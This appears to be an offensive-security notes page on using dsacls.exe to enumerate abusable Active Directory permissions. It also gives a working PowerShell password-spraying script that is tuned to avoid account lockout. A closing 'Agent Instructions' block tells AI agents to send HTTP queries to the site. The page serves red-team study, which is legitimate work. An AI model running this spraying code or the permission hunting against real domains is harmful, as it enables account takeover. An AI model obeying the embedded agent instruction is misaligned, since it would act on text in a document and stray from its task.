# Enumerating AD Object Permissions with dsacls

It is possible to use a native windows binary (in addition to powershell cmdlet `Get-Acl`) to enumerate Active Directory object security persmissions. The binary of interest is `dsacls.exe`.

Dsacls allows us to display or modify permissions (ACLS) of an Active Directory Domain Services (AD DS).

## Execution

Let's check if user `spot` has any special permissions against user's `spotless` AD object:

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
```

{% endcode %}

Nothing useful:

![](/files/-LaN7itzG7az7P-wRr6s)

Let's give user spot `Reset Password` and `Change Password` permissions on `spotless` AD object:

![](/files/-LaN7_JUpqnM0gcxouwl)

...and try the command again:

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
```

{% endcode %}

![](/files/-LaN7R50_E37uFhKaILH)

### Full Control

All well known (and abusable) AD object permissions should be sought here. One of them is `FULL CONTROL`:

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "full control"
```

{% endcode %}

![](/files/-LaN9WENW2egvrpo8X9K)

### Add/Remove self as member

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" | select-string "spotless"
```

{% endcode %}

![](/files/-LaNAHL_wSGsVIE5kfa3)

### WriteProperty/ChangeOwnerShip

![](/files/-LaNAksNf4H3bPs9BT0t)

Enumerating AD object permissions this way does not come in a nice format that can be piped between powershell cmd-lets, but it's still something to keep in mind if you do not the ability to use tools like powerview or ActiveDirectory powershell cmdlets or if you are trying to `LOL`.

For more good privileges to be abused:

{% content-ref url="/pages/-LTx64XAYznr7BOWOADR" %}
[Privileged Accounts and Token Privileges](/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges.md)
{% endcontent-ref %}

{% content-ref url="/pages/-LQimOasCuAaGC6hgChU" %}
[Abusing Active Directory ACLs/ACEs](/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md)
{% endcontent-ref %}

## Password Spraying Anyone?

As a side note, the `dsacls` binary could be used to do LDAP password spraying as it allows us to bind to an LDAP session with a specified username and password:

{% code title="incorrect logon" %}

```csharp
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:1234567
```

{% endcode %}

![Logon Failure](/files/-LaNCrJyr0IcdJ09FfvC)

{% code title="correct logon" %}

```csharp
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:123456
```

{% endcode %}

![Logon Successful](/files/-LaND3ClUvQm32WwdWmL)

### Dirty POC idea for Password Spraying:

{% code title="attacker\@victim" %}

```csharp
$domain = ((cmd /c set u)[-3] -split "=")[-1]
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
$password = "123456"

# (Get-Content users.txt)
"krbtgt","spotless" | % {
    $badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
    if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
        $isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:$_@offense.local /passwd:$password | select-string -pattern "Invalid Credentials"
        if ($isInvalid -match "Invalid") {
            Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
        } else {
            Write-Host "[+] Working Credentials for $_ : $password" -foreground green
        }        
    }
}
```

{% endcode %}

![](/files/-LaNQokIjU3XkqUj39tP)

## References

{% embed url="<https://support.microsoft.com/en-gb/help/281146/how-to-use-dsacls-exe-in-windows-server-2003-and-windows-2000>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.